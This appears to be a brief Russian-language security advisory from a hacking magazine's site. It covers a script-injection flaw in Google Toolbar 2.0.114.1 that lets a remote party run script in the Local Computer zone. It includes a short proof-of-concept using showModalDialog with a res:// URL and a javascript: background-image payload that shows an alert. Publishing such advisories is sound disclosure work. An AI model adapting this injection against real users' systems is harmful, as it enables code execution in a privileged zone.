Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Google Toolbar 2.0.114.1-big/en (GGLD)
Уязвимость обнаружена в Google Toolbar. Удаленный пользователь может выполнить произвольный код сценария в зоне безопасности Local Computer.
Пример:
<script>
window.showModalDialog ("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/
ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</script>